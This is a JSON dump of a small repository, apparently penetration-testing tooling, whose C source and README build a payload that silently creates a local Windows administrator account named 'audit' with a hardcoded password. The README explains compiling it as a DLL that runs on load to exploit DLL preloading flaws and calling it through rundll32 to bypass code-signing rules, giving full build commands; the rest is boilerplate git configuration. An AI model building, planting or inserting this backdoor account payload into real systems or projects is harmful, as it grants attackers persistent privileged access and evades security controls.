[
  {
    "path": ".gitattributes",
    "content": "# Auto detect text files and perform LF normalization\n* text=auto\n\n# Custom for Visual Studio\n*.cs     diff=csharp\n*.sln    merge=union\n*.csproj merge=union\n*.vbproj merge=union\n*.fsproj merge=union\n*.dbproj merge=union\n\n# Standard to msysgit\n*.doc\t diff=astextplain\n*.DOC\t diff=astextplain\n*.docx diff=astextplain\n*.DOCX diff=astextplain\n*.dot  diff=astextplain\n*.DOT  diff=astextplain\n*.pdf  diff=astextplain\n*.PDF\t diff=astextplain\n*.rtf\t diff=astextplain\n*.RTF\t diff=astextplain\n"
  },
  {
    "path": ".gitignore",
    "content": "#################\n## Eclipse\n#################\n\n*.pydevproject\n.project\n.metadata\nbin/\ntmp/\n*.tmp\n*.bak\n*.swp\n*~.nib\nlocal.properties\n.classpath\n.settings/\n.loadpath\n\n# External tool builders\n.externalToolBuilders/\n\n# Locally stored \"Eclipse launch configurations\"\n*.launch\n\n# CDT-specific\n.cproject\n\n# PDT-specific\n.buildpath\n\n\n#################\n## Visual Studio\n#################\n\n## Ignore Visual Studio temporary files, build results, and\n## files generated by popular Visual Studio add-ons.\n\n# User-specific files\n*.suo\n*.user\n*.sln.docstates\n\n# Build results\n[Dd]ebug/\n[Rr]elease/\n*_i.c\n*_p.c\n*.ilk\n*.meta\n*.obj\n*.pch\n*.pdb\n*.pgc\n*.pgd\n*.rsp\n*.sbr\n*.tlb\n*.tli\n*.tlh\n*.tmp\n*.vspscc\n.builds\n*.dotCover\n\n## TODO: If you have NuGet Package Restore enabled, uncomment this\n#packages/\n\n# Visual C++ cache files\nipch/\n*.aps\n*.ncb\n*.opensdf\n*.sdf\n\n# Visual Studio profiler\n*.psess\n*.vsp\n\n# ReSharper is a .NET coding add-in\n_ReSharper*\n\n# Installshield output folder\n[Ee]xpress\n\n# DocProject is a documentation generator add-in\nDocProject/buildhelp/\nDocProject/Help/*.HxT\nDocProject/Help/*.HxC\nDocProject/Help/*.hhc\nDocProject/Help/*.hhk\nDocProject/Help/*.hhp\nDocProject/Help/Html2\nDocProject/Help/html\n\n# Click-Once directory\npublish\n\n# Others\n[Bb]in\n[Oo]bj\nsql\nTestResults\n*.Cache\nClientBin\nstylecop.*\n~$*\n*.dbmdl\nGenerated_Code #added for RIA/Silverlight projects\n\n# Backup & report files from converting an old project file to a newer\n# Visual Studio version. Backup files are not needed, because we have git ;-)\n_UpgradeReport_Files/\nBackup*/\nUpgradeLog*.XML\n\n\n\n############\n## Windows\n############\n\n# Windows image file caches\nThumbs.db\n\n# Folder config file\nDesktop.ini\n\n\n#############\n## Python\n#############\n\n*.py[co]\n\n# Packages\n*.egg\n*.egg-info\ndist\nbuild\neggs\nparts\nbin\nvar\nsdist\ndevelop-eggs\n.installed.cfg\n\n# Installer logs\npip-log.txt\n\n# Unit test / coverage reports\n.coverage\n.tox\n\n#Translations\n*.mo\n\n#Mr Developer\n.mr.developer.cfg\n\n# Mac crap\n.DS_Store\n"
  },
  {
    "path": "README.md",
    "content": "# adduser\n\nProgrammatically creates a 'local admin' Windows user. Requires admin rights. The created user is hardcoded to the following:\n\nLogin: `audit`\nPassword: `Test123456789!` (this should be good enough to fit most password policies)\n\nThis standalone piece code can run in many contexts:\n- As a command-line EXE.\n- As a DLL (the user will be created on DLL load). This is useful to exploit \"DLL Preloading\" issues.\n- As a DLL, through `rundll32.exe adduser.dll,CreateAdminUser@16`. This is useful to bypass mandatory code signing applied to EXE files only.\n\n## Compiling\n### Using MinGW (tested on macOS, but Linux should work)\n\n- Create a 32-bit EXE file:\n`i686-w64-mingw32-gcc -oadduser32.exe adduser.c -lnetapi32`\n- Create a 32-bit DLL file:\n`i686-w64-mingw32-gcc -shared -oadduser32.dll adduser.c -lnetapi32`\n- Create a 64-bit EXE file:\n`x86_64-w64-mingw32-gcc -oadduser64.exe adduser.c -lnetapi32`\n- Create a 64-bit DLL file:\n`x86_64-w64-mingw32-gcc -shared -oadduser64.dll adduser.c -lnetapi32`\n\n### Using Visual Studio (tested with VS2013)\n\n- Create an EXE file:\n`cl.exe adduser.c /link /DEFAULTLIB:ADVAPI32 /DEFAULTLIB:NETAPI32`\n- Create a DLL file:\n`cl.exe adduser.c /LD /link /DEFAULTLIB:ADVAPI32 /DEFAULTLIB:NETAPI32`"
  },
  {
    "path": "adduser.c",
    "content": "/*\n * ADDUSER.C: creating a Windows user programmatically.\n */\n\n#define UNICODE\n#define _UNICODE\n\n#include <windows.h>\n#include <string.h>\n#include <Lmaccess.h>\n#include <lmerr.h>\n#include <Tchar.h>\n\n\nDWORD CreateAdminUserInternal(void)\n{\nNET_API_STATUS rc;\nBOOL b;\nDWORD dw;\n\nUSER_INFO_1 ud;\nLOCALGROUP_MEMBERS_INFO_0 gd;\nSID_NAME_USE snu;\n\nDWORD cbSid = 256;\t// 256 bytes should be enough for everybody :)\nBYTE Sid[256];\n\nDWORD cbDomain = 256 / sizeof(TCHAR);\nTCHAR Domain[256];\n\n\t//\n\t// Create user\n\t// http://msdn.microsoft.com/en-us/library/aa370649%28v=VS.85%29.aspx\n\t//\n\n\tmemset(&ud, 0, sizeof(ud));\n\n\tud.usri1_name\t\t= _T(\"audit\");\t\t\t\t\t\t// username\n\tud.usri1_password\t= _T(\"Test123456789!\");\t\t\t\t// password\n\tud.usri1_priv\t\t= USER_PRIV_USER;\t\t\t\t\t// cannot set USER_PRIV_ADMIN on creation\n\tud.usri1_flags\t\t= UF_SCRIPT | UF_NORMAL_ACCOUNT;\t// must be set\n\tud.usri1_script_path = NULL;\n\n\trc = NetUserAdd(\n\t\tNULL,\t\t\t// local server\n\t\t1,\t\t\t\t// information level\n\t\t(LPBYTE)&ud,\n\t\tNULL\t\t\t// error value\n\t);\n\n\tif (rc != NERR_Success) {\n\t\t_tprintf(_T(\"NetUserAdd FAIL %d 0x%08x\\r\\n\"), rc, rc);\n\t\treturn rc;\n\t}\n\n\t//\n\t// Get user SID\n\t// http://msdn.microsoft.com/en-us/library/aa379159(v=vs.85).aspx\n\t//\n\n\tb = LookupAccountName(\n\t\tNULL,\t\t\t// local server\n\t\t_T(\"audit\"),\t// account name\n\t\tSid,\t\t\t// SID\n\t\t&cbSid,\t\t\t// SID size\n\t\tDomain,\t\t\t// Domain\n\t\t&cbDomain,\t\t// Domain size\n\t\t&snu\t\t\t// SID_NAME_USE (enum)\n\t);\n\n\tif (!b) {\n\t\tdw = GetLastError();\n\t\t_tprintf(_T(\"LookupAccountName FAIL %d 0x%08x\\r\\n\"), dw, dw);\n\t\treturn dw;\n\t}\n\n\t//\n\t// Add user to \"Administrators\" local group\n\t// http://msdn.microsoft.com/en-us/library/aa370436%28v=VS.85%29.aspx\n\t//\n\n\tmemset(&gd, 0, sizeof(gd));\n\n\tgd.lgrmi0_sid = (PSID)Sid;\n\n\trc = NetLocalGroupAddMembers(\n\t\tNULL,\t\t\t\t\t// local server\n\t\t_T(\"Administrators\"),\n\t\t0,\t\t\t\t\t\t// information level\n\t\t(LPBYTE)&gd,\n\t\t1\t\t\t\t\t\t// only one entry\n\t);\n\n\tif (rc != NERR_Success) {\n\t\t_tprintf(_T(\"NetLocalGroupAddMembers FAIL %d 0x%08x\\r\\n\"), rc, rc);\n\t\treturn rc;\n\t}\n\n\treturn 0;\n}\n\n//\n// DLL entry point.\n//\n\nBOOL APIENTRY DllMain(HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved)\n{\n\tswitch (ul_reason_for_call)\n\t{\n\tcase DLL_PROCESS_ATTACH:\n\t\tCreateAdminUserInternal();\n\tcase DLL_THREAD_ATTACH:\n\tcase DLL_THREAD_DETACH:\n\tcase DLL_PROCESS_DETACH:\n\t\tbreak;\n\t}\n\treturn TRUE;\n}\n\n//\n// RUNDLL32 entry point.\n// https://support.microsoft.com/en-us/help/164787/info-windows-rundll-and-rundll32-interface\n//\n\n#ifdef __cplusplus\nextern \"C\" {\n#endif\n\n__declspec(dllexport) void __stdcall CreateAdminUser(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow)\n{\n\tCreateAdminUserInternal();\n}\n\n#ifdef __cplusplus\n}\n#endif\n\n//\n// Command-line entry point.\n//\n\nint main()\n{\n\treturn CreateAdminUserInternal();\n}\n"
  }
]